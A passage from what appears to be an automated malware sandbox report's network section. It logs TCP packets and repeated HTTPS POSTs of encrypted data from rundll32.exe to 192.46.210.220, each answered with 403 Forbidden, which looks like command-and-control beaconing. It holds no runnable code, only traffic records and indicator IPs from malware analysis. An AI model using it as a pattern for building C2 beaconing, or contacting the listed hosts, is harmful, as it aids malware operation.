                                                                                                      Oct 28, 2021 05:01:51.288537979 CEST497766891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:01:51.288649082 CEST497766891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:01:51.299462080 CEST80849777143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:51.299565077 CEST49777808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:51.305150986 CEST49777808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:51.453810930 CEST68914977645.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:01:51.453831911 CEST68914977645.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:01:51.465883017 CEST80849777143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:51.467494011 CEST80849777143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:51.467566013 CEST49777808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:51.839304924 CEST68914977645.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:01:51.839324951 CEST68914977645.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:01:51.839469910 CEST497766891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:01:51.839524031 CEST497766891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:01:52.840224028 CEST49777808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:52.847007990 CEST497766891192.168.2.445.77.0.96
                                                                                                      Oct 28, 2021 05:01:52.984427929 CEST497788116192.168.2.4185.56.219.47
                                                                                                      Oct 28, 2021 05:01:53.000657082 CEST80849777143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:53.001019955 CEST80849777143.244.140.214192.168.2.4
                                                                                                      Oct 28, 2021 05:01:53.001115084 CEST49777808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:53.012388945 CEST68914977645.77.0.96192.168.2.4
                                                                                                      Oct 28, 2021 05:01:53.036973953 CEST811649778185.56.219.47192.168.2.4
                                                                                                      Oct 28, 2021 05:01:53.037148952 CEST497788116192.168.2.4185.56.219.47
                                                                                                      Oct 28, 2021 05:01:53.228377104 CEST49777808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:53.228467941 CEST49777808192.168.2.4143.244.140.214
                                                                                                      Oct 28, 2021 05:01:53.229899883 CEST497788116192.168.2.4185.56.219.47

                                                                                                      ICMP Packets

                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                      Oct 28, 2021 05:03:10.806423903 CEST192.168.2.48.8.8.8d0f0(Port unreachable)Destination Unreachable

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 192.46.210.220

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.449759192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:01:45 UTC0OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:01:45 UTC0OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:01:46 UTC4INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:01:46 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.449774192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:01:49 UTC4OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:01:49 UTC5OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:01:50 UTC9INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:01:50 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      10192.168.2.449816192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:09 UTC49OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:09 UTC50OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:10 UTC54INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:10 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      11192.168.2.449820192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:13 UTC54OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:13 UTC55OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:14 UTC59INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:13 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      12192.168.2.449824192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:14 UTC59OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:14 UTC60OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:15 UTC64INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:15 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      13192.168.2.449828192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:17 UTC64OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:17 UTC65OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:17 UTC69INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:17 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      14192.168.2.449832192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:18 UTC69OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:18 UTC69OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:19 UTC74INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:19 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      15192.168.2.449837192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:21 UTC74OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:21 UTC74OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:21 UTC79INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:21 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      16192.168.2.449840192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:22 UTC79OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:22 UTC79OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:23 UTC84INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:23 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      17192.168.2.449844192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:25 UTC84OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:25 UTC84OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:25 UTC89INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:25 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      18192.168.2.449848192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:26 UTC89OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:26 UTC89OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:27 UTC94INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:27 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      19192.168.2.449853192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:29 UTC94OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:29 UTC94OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:29 UTC99INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:29 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      2192.168.2.449781192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:01:54 UTC9OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
